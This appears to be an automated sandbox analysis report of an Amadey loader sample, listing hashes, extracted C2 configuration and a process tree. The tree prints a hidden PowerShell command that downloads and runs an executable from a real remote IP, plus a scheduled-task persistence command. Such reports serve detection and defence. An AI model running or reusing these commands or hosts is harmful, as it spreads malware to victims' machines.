Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
08-02-2025 19:30
Static task
static1
Behavioral task
behavioral1
Sample
26LC9_random.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
26LC9_random.exe
Resource
win10v2004-20250207-en
General
-
Target
26LC9_random.exe
-
Size
938KB
-
MD5
5f5311db746cf4e37cbce62174620467
-
SHA1
046464dd8858bafee645c26c225abc209379199d
-
SHA256
35fbdd95d2951a99c5420f110a434bebb19ee51ddd040c28c45f9cb71d5ca9b9
-
SHA512
c8b948e9dc298240b86511ee73684496b8da66fb41bae82af5a27789348155e410d27cac594bd75a65ffc312a87d8629ff78b8125a39a7cb55e90b6a8b5f0acc
-
SSDEEP
24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8ayxF:nTvC/MTQYxsWR7ayx
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Signatures
-
Amadey family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 3056 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3056 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 4 3056 powershell.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Executes dropped EXE 2 IoCs
pid Process 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE 1380 skotes.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine skotes.exe -
Loads dropped DLL 4 IoCs
pid Process 3056 powershell.exe 3056 powershell.exe 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE 1380 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 26LC9_random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2960 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3056 powershell.exe 3056 powershell.exe 3056 powershell.exe 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE 1380 skotes.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3056 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2284 26LC9_random.exe 2284 26LC9_random.exe 2284 26LC9_random.exe 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2284 26LC9_random.exe 2284 26LC9_random.exe 2284 26LC9_random.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2284 wrote to memory of 2484 2284 26LC9_random.exe 29 PID 2284 wrote to memory of 2484 2284 26LC9_random.exe 29 PID 2284 wrote to memory of 2484 2284 26LC9_random.exe 29 PID 2284 wrote to memory of 2484 2284 26LC9_random.exe 29 PID 2284 wrote to memory of 2588 2284 26LC9_random.exe 30 PID 2284 wrote to memory of 2588 2284 26LC9_random.exe 30 PID 2284 wrote to memory of 2588 2284 26LC9_random.exe 30 PID 2284 wrote to memory of 2588 2284 26LC9_random.exe 30 PID 2484 wrote to memory of 2960 2484 cmd.exe 32 PID 2484 wrote to memory of 2960 2484 cmd.exe 32 PID 2484 wrote to memory of 2960 2484 cmd.exe 32 PID 2484 wrote to memory of 2960 2484 cmd.exe 32 PID 2588 wrote to memory of 3056 2588 mshta.exe 33 PID 2588 wrote to memory of 3056 2588 mshta.exe 33 PID 2588 wrote to memory of 3056 2588 mshta.exe 33 PID 2588 wrote to memory of 3056 2588 mshta.exe 33 PID 3056 wrote to memory of 2736 3056 powershell.exe 35 PID 3056 wrote to memory of 2736 3056 powershell.exe 35 PID 3056 wrote to memory of 2736 3056 powershell.exe 35 PID 3056 wrote to memory of 2736 3056 powershell.exe 35 PID 2736 wrote to memory of 1380 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE 36 PID 2736 wrote to memory of 1380 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE 36 PID 2736 wrote to memory of 1380 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE 36 PID 2736 wrote to memory of 1380 2736 TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\26LC9_random.exe"C:\Users\Admin\AppData\Local\Temp\26LC9_random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn yZrDrmabUGS /tr "mshta C:\Users\Admin\AppData\Local\Temp\kIm97H9q4.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn yZrDrmabUGS /tr "mshta C:\Users\Admin\AppData\Local\Temp\kIm97H9q4.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2960
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\kIm97H9q4.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Users\Admin\AppData\Local\TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE"C:\Users\Admin\AppData\Local\TempWIH8RLKS1WLYKNQT2GXPIC8JGOAY7DYC.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1380
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
720B
MD5fc293d3e25acb6314b2d0d27d269e7b1
SHA1f66a00340130b1439bd5dac7f001663040c18bfc
SHA2567589c9149b1f6faa6b8814b885f1ab6a70c22128173527581f325847264ee978
SHA512717d26d8d0907ac75bd0855fa0c1ad29100f38d91af1e4ae8fa3d5d5c8efeec49b52429cd2975026d49c2f536423c4e74fcab61e81d6cc7bda0411b517530495
-
Filesize
2.0MB
MD5e49eb0e441625b8cd5ab5241449addf1
SHA196a28bc2a6105f7cbf7297728eff394d417d5364
SHA2565b29145293b504d880d928aa97f1fb5b9e3fc04c55b4ec687b97c9f410adec91
SHA512b61922d2728fda759ae8008f4b594152707e9de217c70107c9c89317815d4298cf87b57a006dab9c11d0202f4ebdf943314691a378e77828ff37f8fcbdc22e83